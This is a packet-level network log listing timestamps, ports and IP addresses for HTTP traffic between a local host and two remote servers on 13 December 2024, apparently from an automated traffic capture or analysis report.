Dec 13, 2024 07:47:08.168479919 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.168530941 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.168598890 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.168649912 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.169472933 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.169503927 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.169527054 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.169567108 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.170311928 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.170326948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.170398951 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.171127081 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.171143055 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.171206951 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.171844006 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.171925068 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.172018051 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.172072887 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.173620939 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.173635960 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.173652887 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.173683882 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.173695087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.173695087 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.173723936 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.175081968 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.175097942 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.175158024 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.175220966 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.175252914 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.175299883 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.175318956 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.175347090 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.176158905 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.176175117 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.176209927 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.176243067 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.177262068 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.177277088 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.177350044 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.177826881 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.177920103 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:08.802464008 CET	80	49739	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:08.802544117 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:08.830229044 CET	80	49740	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:08.830338001 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.038959026 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.064861059 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.159157991 CET	80	49741	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:09.159257889 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.170512915 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.184598923 CET	80	49742	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:09.184693098 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.188791990 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:09.290503979 CET	80	49741	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:09.308697939 CET	80	49742	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.128921032 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.128974915 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.129255056 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.249033928 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.249196053 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.249228954 CET	80	49740	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.249389887 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.249557018 CET	49740	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.249645948 CET	80	49738	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.249730110 CET	49738	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.369066000 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.426588058 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.426742077 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.457221985 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.493333101 CET	80	49741	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.493417978 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.496156931 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.515801907 CET	80	49742	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.515861988 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.518013954 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.546561003 CET	80	49744	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.546753883 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.546853065 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.546878099 CET	80	49739	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.546999931 CET	49739	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.576972961 CET	80	49745	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.577043056 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.577186108 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:10.616041899 CET	80	49746	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.616153002 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.616377115 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.637814999 CET	80	49747	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.638009071 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.638103008 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:10.666548014 CET	80	49744	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.696926117 CET	80	49745	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:10.736079931 CET	80	49746	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:10.757868052 CET	80	49747	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:11.583082914 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583102942 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583115101 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583127022 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583137989 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583257914 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583266020 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.583266020 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.583300114 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583321095 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583333015 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583344936 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.583359957 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.583372116 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.583425045 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.703248978 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.703388929 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.703622103 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.707350969 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.707412958 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.775377035 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.775446892 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.775618076 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.779534101 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.779794931 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.779943943 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.787914038 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.788002968 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.788017988 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.788088083 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.796339989 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.796468973 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.796632051 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.804821968 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.804848909 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.804909945 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.804936886 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.813123941 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.813227892 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.813360929 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.821547985 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.821613073 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.821685076 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.829895973 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.830003977 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.830079079 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.838351011 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.838418961 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.838504076 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.838560104 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.846716881 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.846805096 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.846854925 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.846914053 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.854645967 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.854722977 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.854790926 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.884128094 CET	80	49744	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:11.888371944 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:11.923661947 CET	80	49745	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.924545050 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.951952934 CET	80	49746	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:11.952254057 CET	49746	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:11.967598915 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.967670918 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.967720032 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.967796087 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.969995022 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.970097065 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.970105886 CET	80	49747	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:11.970160961 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.973836899 CET	49747	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:11.975111008 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.975166082 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.975199938 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.975253105 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.980036020 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.980072975 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.980128050 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.984956980 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.985045910 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.985096931 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.989908934 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.989967108 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.990046978 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.990312099 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.994899988 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.994960070 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.994998932 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.995069027 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:11.999891996 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:11.999954939 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.000072956 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.003855944 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.004865885 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.004926920 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.004962921 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.005012989 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.009840012 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.009941101 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.010009050 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.014839888 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.014889956 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.014949083 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.019819021 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.019887924 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.019964933 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.024791956 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.024883032 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.024959087 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.029762983 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.029856920 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.029856920 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.029926062 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.034737110 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.034883022 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.034960985 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.039678097 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.039868116 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.159612894 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.159807920 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.159898043 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.160753012 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.160815954 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.160849094 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.160921097 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.165137053 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.165252924 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.165321112 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.169488907 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.169590950 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.169658899 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.173969030 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.174027920 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.174061060 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.174133062 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.178270102 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.178380013 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.178510904 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.182529926 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.182650089 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.182720900 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.186881065 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.187042952 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.187153101 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.191222906 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.191294909 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.191334963 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.191386938 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.195573092 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.195704937 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.195779085 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.199987888 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.200098991 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.200166941 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.204262018 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.204370022 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.204432011 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.208435059 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.208547115 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.208609104 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.212624073 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.212745905 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.212804079 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.216814995 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.216876030 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.216891050 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.216939926 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.221019983 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.221081972 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.221168041 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.221237898 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.225187063 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.225250959 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.225405931 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.225461960 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.229398012 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.229531050 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.229600906 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.233521938 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.233601093 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.233676910 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.233743906 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.237716913 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.237828016 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:12.237885952 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:12.914020061 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.034121990 CET	80	49748	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.034224987 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.043967962 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.059379101 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.164020061 CET	80	49748	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.179184914 CET	80	49749	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.179338932 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.179549932 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.299420118 CET	80	49749	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.394484043 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:13.394840956 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:13.426381111 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.426441908 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.426806927 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.514775038 CET	80	49750	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:13.514797926 CET	80	49744	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:13.514909983 CET	49744	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:13.515197039 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:13.515197039 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:13.546696901 CET	80	49751	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.546720028 CET	80	49743	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.546811104 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.546816111 CET	49743	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.547029018 CET	80	49745	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:13.547077894 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.547091961 CET	49745	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:13.635086060 CET	80	49750	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:13.666862965 CET	80	49751	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:14.440793037 CET	80	49748	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:14.440876007 CET	49748	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:14.450115919 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.549736977 CET	80	49749	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:14.549829960 CET	49749	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:14.552400112 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.570020914 CET	80	49752	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:14.570106983 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.570233107 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.672346115 CET	80	49753	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:14.672444105 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.672689915 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.690042973 CET	80	49752	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:14.792412996 CET	80	49753	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:14.878485918 CET	80	49750	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:14.878634930 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:14.895461082 CET	80	49751	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:14.895549059 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:15.501024008 CET	80	49741	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:15.501101017 CET	49741	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:15.531547070 CET	80	49742	185.81.68.147	192.168.2.4
Dec 13, 2024 07:47:15.531622887 CET	49742	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:15.970062017 CET	80	49752	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:15.970252991 CET	49752	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.063846111 CET	80	49753	185.81.68.148	192.168.2.4
Dec 13, 2024 07:47:16.063977003 CET	49753	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.584547997 CET	49750	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.584755898 CET	49754	80	192.168.2.4	185.81.68.148
Dec 13, 2024 07:47:16.599529028 CET	49751	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:16.599792004 CET	49755	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:16.704586029 CET	80	49754	185.81.68.148	192.168.2.4
